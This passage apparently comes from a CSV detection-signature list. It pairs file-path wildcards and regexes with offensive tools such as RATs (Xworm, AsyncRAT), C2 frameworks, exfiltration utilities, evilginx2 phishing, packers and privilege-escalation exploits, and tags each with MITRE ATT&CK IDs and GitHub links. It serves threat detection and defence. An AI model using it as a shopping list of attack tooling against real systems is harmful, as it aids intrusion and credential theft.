"*\payload.exe*",".{0,1000}\\payload\.exe.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*\payload_placement.exe*",".{0,1000}\\payload_placement\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - 
TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*\Payloads\*.bin*",".{0,1000}\\Payloads\\.{0,1000}\.bin.{0,1000}","offensive_tool_keyword","SingleDose","SingleDose is a framework to build shellcode load/process injection techniques","T1055 - T1185","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Wra7h/SingleDose","1","0","N/A","10","2","151","27","2023-05-15T19:46:43Z","2021-08-28T05:04:50Z" "*\payloadtests.py*",".{0,1000}\\payloadtests\.py.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3252","785","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z" "*\pe2sh.exe*",".{0,1000}\\pe2sh\.exe.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*\PEASS-ng*",".{0,1000}\\PEASS\-ng.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "*\PerfExec.exe*",".{0,1000}\\PerfExec\.exe.{0,1000}","offensive_tool_keyword","PerfExec","PerfExec - an example performance dll that will run CMD.exe and a .NET assembly that will execute the DLL or gather performance data locally or remotely.","T1055.001 - T1059.001 - 
T1059.003 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/PerfExec","1","0","N/A","7","1","75","12","2023-08-02T20:53:24Z","2023-07-11T16:43:47Z" "*\Perfusion.cpp*",".{0,1000}\\Perfusion\.cpp.{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","0","N/A","10","5","405","74","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z" "*\Perfusion.exe*",".{0,1000}\\Perfusion\.exe.{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","0","N/A","10","5","405","74","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z" "*\Perfusion.sln*",".{0,1000}\\Perfusion\.sln.{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","0","N/A","10","5","405","74","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z" "*\PerfusionDll.cpp*",".{0,1000}\\PerfusionDll\.cpp.{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","0","N/A","10","5","405","74","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z" "*\PerfusionDll.dll*",".{0,1000}\\PerfusionDll\.dll.{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 
2088R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","1","N/A","10","5","405","74","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z" "*\PerfusionDll.log*",".{0,1000}\\PerfusionDll\.log.{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","0","N/A","10","5","405","74","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z" "*\persist.vbs*",".{0,1000}\\persist\.vbs.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*\persist_cortana.py*",".{0,1000}\\persist_cortana\.py.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","0","N/A","10","10","949","198","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z" "*\persist_people.py*",".{0,1000}\\persist_people\.py.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","0","N/A","10","10","949","198","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z" "*\Persiste.ps1*",".{0,1000}\\Persiste\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse 
tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\Persistence.cpp*",".{0,1000}\\Persistence\.cpp.{0,1000}","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","2","144","32","2023-10-10T19:01:42Z","2023-10-02T20:49:22Z" "*\Persistence.exe*",".{0,1000}\\Persistence\.exe.{0,1000}","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","2","144","32","2023-10-10T19:01:42Z","2023-10-02T20:49:22Z" "*\Persistence.vbs*",".{0,1000}\\Persistence\.vbs.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" 
"*\persistence\elevated\rid_hijack*",".{0,1000}\\persistence\\elevated\\rid_hijack.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","0","N/A","9","2","166","47","2022-09-02T08:43:14Z","2018-07-14T18:48:51Z" "*\persistence_demos-master*",".{0,1000}\\persistence_demos\-master.{0,1000}","offensive_tool_keyword","persistence_demos","Demos of various (also non standard) persistence methods used by malware","T1546 - T1547 - T1133 - T1053 - T1037","TA0003 ","N/A","N/A","Persistence","https://github.com/hasherezade/persistence_demos","1","0","N/A","7","3","215","47","2023-03-05T17:01:14Z","2017-05-16T09:08:47Z" "*\PersistsMalware.cs*",".{0,1000}\\PersistsMalware\.cs.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","0","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z" "*\persit_linux.go*",".{0,1000}\\persit_linux\.go.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","0","N/A","10","10","949","198","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z" "*\persit_windows.go*",".{0,1000}\\persit_windows\.go.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","0","N/A","10","10","949","198","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z" 
"*\petit\pipe\srvsvc*",".{0,1000}\\petit\\pipe\\srvsvc.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "*\petitpotam.py*",".{0,1000}\\petitpotam\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\PetitPotato.cpp*",".{0,1000}\\PetitPotato\.cpp.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "*\PetitPotato.log*",".{0,1000}\\PetitPotato\.log.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "*\petitpotato.obj*",".{0,1000}\\petitpotato\.obj.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" 
"*\petitpotato.pdb*",".{0,1000}\\petitpotato\.pdb.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "*\PetitPotato.sln*",".{0,1000}\\PetitPotato\.sln.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "*\PetitPotato.tlog*",".{0,1000}\\PetitPotato\.tlog.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "*\PetitPotato.vcxproj*",".{0,1000}\\PetitPotato\.vcxproj.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "*\petitpotato\x64\*",".{0,1000}\\petitpotato\\x64\\.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" 
"*\PetitPotato-1.0.0.zip*",".{0,1000}\\PetitPotato\-1\.0\.0\.zip.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "*\PetitPotato-1.0.0\*",".{0,1000}\\PetitPotato\-1\.0\.0\\.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "*\PEzor.cpp*",".{0,1000}\\PEzor\.cpp.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*\PEzor.hpp*",".{0,1000}\\PEzor\.hpp.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*\PEzor\loader.c*",".{0,1000}\\PEzor\\loader\.c.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*\PhishCreds.ps1*",".{0,1000}\\PhishCreds\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - 
T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\phishlets\example.yaml*",".{0,1000}\\phishlets\\example\.yaml.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/kgretzky/evilginx2","1","0","N/A","10","10","9938","1813","2024-05-01T02:57:08Z","2018-07-10T09:59:52Z" "*\php-backdoor.php*",".{0,1000}\\php\-backdoor\.php.{0,1000}","offensive_tool_keyword","webshell","A collection of webshell","T1505.003 - T1100 - T1190 - T1505.004","TA0003 - TA0011 ","N/A","N/A","Persistence","https://github.com/Peaky-XD/webshell","1","0","N/A","10","1","48","11","2024-03-02T05:51:24Z","2024-02-28T15:12:42Z" "*\PHVNC.exe*",".{0,1000}\\PHVNC\.exe.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*\PHVNC.pdb*",".{0,1000}\\PHVNC\.pdb.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 
- T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*\PickleC2\Core\*.py*",".{0,1000}\\PickleC2\\Core\\.{0,1000}\.py.{0,1000}","offensive_tool_keyword","PickleC2","PickleC2 is a post-exploitation and Lateral Movements framework","T1059.006 - T1021 - T1071 - T1550 - T1560 - T1570","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/xRET2pwn/PickleC2","1","0","N/A","10","10","82","19","2021-07-26T21:12:04Z","2021-07-13T09:16:19Z" "*\PILOT.ps1*",".{0,1000}\\PILOT\.ps1.{0,1000}","offensive_tool_keyword","PILOT","Pilot is a simplified system designed for the stealthy transfer of files across networks using ICMP","T1048.001 - T1573.001 - T1020","TA0010 - TA0002 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/dahvidschloss/PILOT","1","0","N/A","9","1","60","4","2024-04-16T18:24:44Z","2024-04-03T15:04:33Z" "*\PILOT\ATC.py*",".{0,1000}\\PILOT\\ATC\.py.{0,1000}","offensive_tool_keyword","PILOT","Pilot is a simplified system designed for the stealthy transfer of files across networks using ICMP","T1048.001 - T1573.001 - T1020","TA0010 - TA0002 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/dahvidschloss/PILOT","1","0","N/A","9","1","60","4","2024-04-16T18:24:44Z","2024-04-03T15:04:33Z" "*\PingRAT\*",".{0,1000}\\PingRAT\\.{0,1000}","offensive_tool_keyword","PingRAT","secretly passes Command and Control (C2) traffic through firewalls using ICMP payloads","T1071.004 - T1573.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/umutcamliyurt/PingRAT","1","0","N/A","10","10","82","12","2023-09-29T22:26:15Z","2023-09-29T22:07:46Z" "*\PingSweep.ps1*",".{0,1000}\\PingSweep\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - 
T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\PInject.ps1*",".{0,1000}\\PInject\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*\pipe\brutepipe*",".{0,1000}\\pipe\\brutepipe.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*\pipe\moj_ML_ntsvcs *",".{0,1000}\\pipe\\moj_ML_ntsvcs\s.{0,1000}","offensive_tool_keyword","mortar","red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. 
Mortar is able to bypass modern anti-virus products and advanced XDR solutions","T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562","TA0002 - TA0003 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","0","N/A","10","10","1347","219","2023-12-21T22:00:38Z","2021-11-25T16:49:47Z" "*\PIPEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA*",".{0,1000}\\PIPEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*\PipeViewer.exe*",".{0,1000}\\PipeViewer\.exe.{0,1000}","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","1","N/A","5","6","529","42","2023-08-23T09:34:06Z","2022-12-22T12:35:34Z" "*\PipeViewer.sln*",".{0,1000}\\PipeViewer\.sln.{0,1000}","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","0","N/A","5","6","529","42","2023-08-23T09:34:06Z","2022-12-22T12:35:34Z" "*\PipeViewer\Program.cs*",".{0,1000}\\PipeViewer\\Program\.cs.{0,1000}","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","0","N/A","5","6","529","42","2023-08-23T09:34:06Z","2022-12-22T12:35:34Z" "*\pkg\merlin.go*",".{0,1000}\\pkg\\merlin\.go.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access 
Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*\Plugins\HRDP.dll*",".{0,1000}\\Plugins\\HRDP\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*\Plugins\HVNC.dll*",".{0,1000}\\Plugins\\HVNC\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*\Plugins\PreventSleep.dll*",".{0,1000}\\Plugins\\PreventSleep\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*\Plugins\RemoteCamera.dll*",".{0,1000}\\Plugins\\RemoteCamera\.dll.{0,1000}","offensive_tool_keyword","AsyncRAT-C-Sharp","Open-Source Remote Administration Tool For Windows C# (RAT)","T1021.002 - T1056.001 - T1113 
- T1133 - T1041 - T1555 - T1129 - T1564.001","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp","1","0","N/A","10","10","2110","708","2023-10-16T21:41:12Z","2019-01-19T04:02:26Z" "*\Plugins\RemoteDesktop.dll*",".{0,1000}\\Plugins\\RemoteDesktop\.dll.{0,1000}","offensive_tool_keyword","AsyncRAT-C-Sharp","Open-Source Remote Administration Tool For Windows C# (RAT)","T1021.002 - T1056.001 - T1113 - T1133 - T1041 - T1555 - T1129 - T1564.001","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp","1","0","N/A","10","10","2110","708","2023-10-16T21:41:12Z","2019-01-19T04:02:26Z" "*\PME\*-ConsoleHistory.txt*",".{0,1000}\\PME\\.{0,1000}\-ConsoleHistory\.txt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*\PME\Console History\*",".{0,1000}\\PME\\Console\sHistory\\.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
